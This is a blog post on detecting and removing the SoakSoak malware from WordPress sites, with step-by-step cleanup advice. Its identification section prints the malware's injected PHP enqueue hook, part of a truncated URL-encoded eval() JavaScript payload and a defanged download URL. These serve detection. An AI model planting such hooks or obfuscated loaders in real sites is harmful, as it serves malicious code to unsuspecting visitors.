How to disinfect website infected from SoakSoak malware

Recently over  100,000+ WordPress Websites got infected by SoakSoak malware. In a report by industry leading security expert Sucuri which can be found here it was ascertained that Google has now blacklisted more than 11k+ domains because of the malware campaign from SoakSoak.ru. Though the reasons for sites being vulnerable has not yet been clarified but all of the websites on Inspire2rise network were safe. This is mainly because of adequate security measure and DNS level filtering that has been put into place. So what can you do if you are already infected with this malware. Recently a friend, Harshmeet Singh from RootMyAndroid.org told us about his website being infected and through his experiences we have found quite a few working methods to remove the SoakSoak malware from websites using the WordPress platform. Read on to know more about how to disinfect website infected from SoakSoak malware.

How to disinfect website infected from SoakSoak malware : Identification.

Firstly you need to identify whether you have been actually infected from the SoakSoak.ru malware or not. To do this you can do two things, first thing is to find some suspicious looking files being served from your website.

The malware modifies the wp-includes/template-loader.php to make it include the following code.

<?php
function FuncQueueObject()
{
 wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

This causes another includes file which is wp-includes/js/swobject.js to be included on every page viewed on the site which includes the following malware:

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

The malware is a javascript malware from SoakSoak.ru, and contains this file in particular – hxxp://soaksoak.ru/xteas/code

If you find these codes in your pages or you are suspicious whether your site is safe or not then you can use the Free Site Security scanner provided by Sucuri.

See more: How to check and change IP address of PC

How to disinfect website infected from SoakSoak malware : The steps.

Now to disinfect your website from this malware perform the following steps in exact order:

1. Download the official WordPress zip from WordPress.org here.
2. Now extract this zip to someplace on your desktop and copy the wp-includes folder.
3. Login to your hosting account or cpanel and go to file manager, head over to the directory where your site is hosted. Delete the wp-includes folder from there and replace it with the wp-includes that you have now from the fresh zip that you downloaded.
4. Now clear all existing caches from caching plugins as well as CDN (if you use any CDN solution like MaxCDN, Cloudflare, Google pagespeed etc.)
5. Check your site again in a browser with cleared caches or incognito window to see if the malware still exists or not.
6. Once you are done removing the malware it’s time to strengthen your site. Install iThemes security plugin for WordPress and configure it using the below guide written by us – How to secure WordPress.
7. Using DNS level filtering through services like cloudflare or using a compatible firewall could save you from many future attacks so keep that also in mind.

Now that you know how to secure your website from the SoakSoak malware don’t forget to share this article with your friends or people you know who might be hurt/suffering due to this malware attack. If you have any doubts or questions or want to add any more working method on how to disinfect website infected from SoakSoak malware then feel free to comment below!

Read more:

• How to setup short domain for WordPress posts
• How to install Genesis framework on a WordPress site
• How to compress large video files without losing quality
• How to memorialize a Facebook profile
• How to transfer blog from one host to another without downtime